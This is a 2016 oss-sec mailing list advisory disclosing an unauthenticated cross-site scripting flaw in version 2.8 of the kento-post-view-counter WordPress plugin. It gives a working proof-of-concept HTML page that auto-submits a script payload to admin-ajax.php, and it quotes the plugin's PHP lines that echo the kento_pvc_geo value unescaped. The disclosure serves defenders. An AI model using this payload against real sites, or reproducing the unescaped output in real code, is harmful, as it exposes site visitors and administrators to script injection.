oss-sec mailing list archives
Unauthenticated XSS Vulnerability in kento-post-view-counter Wordpress Plugin 2.8
From: shravan kumar <cor3sm4sh3r () gmail com>
Date: Sat, 16 Apr 2016 13:41:31 +0530
I would like to disclose a Unauthenticated XSS vulnerability in kento-post-view-counter plugin version 2.8 . The Plugin can be found at *https://wordpress.org/plugins/kento-post-view-counter/ <https://wordpress.org/plugins/kento-post-view-counter/>* This Bug can be triggered by unauthenticated / Authenticated user. If a user is sent a URL by social engineering and the user clicks the link the bug can be triggered. The URL should be something like this http://attackerssite.com/XSS_POC.html The code for XSS_POC.html is as follows: <html> <body onload="document.forms['xss'].submit()" > <form name="xss" action="http://targetsite/wp-admin/admin-ajax.php" method="POST" > <input type="hidden" name="action" value="kento_pvc_top_geo" /> <input type="hidden" name="kento_pvc_geo" value=" <script>alert(1);</script>" /> <input type="submit" value="Submit" /> </form> </body> </html> Technical Details: The vulnerable page is wp-content/plugins/kento-post-view-counter/index.php The Code responsible for the vulnerability : LINE NO 219 onwards if(isset($_POST['kento_pvc_geo'])) { $geo = $_POST['kento_pvc_geo']; } if(empty($geo)) { $geo ="country"; } ..... .... Line No 240 $top_geo.= "<th scope='col' class='manage-column column-name' ><strong>" .ucfirst($geo)."</strong></th>"; Line No 245 $top_geo.= "<th scope='col' class='manage-column column-name' ><strong>" .ucfirst($geo)."</strong></th>"; Line No 283 echo $top_geo; The $top_geo parameter is displayed in unsafe manner without escaping HTML chars . The vulnerable POST parameters is: - kento_pvc_geo -- Shravan Kumar
Current thread:
- Unauthenticated XSS Vulnerability in kento-post-view-counter Wordpress Plugin 2.8 shravan kumar (Apr 16)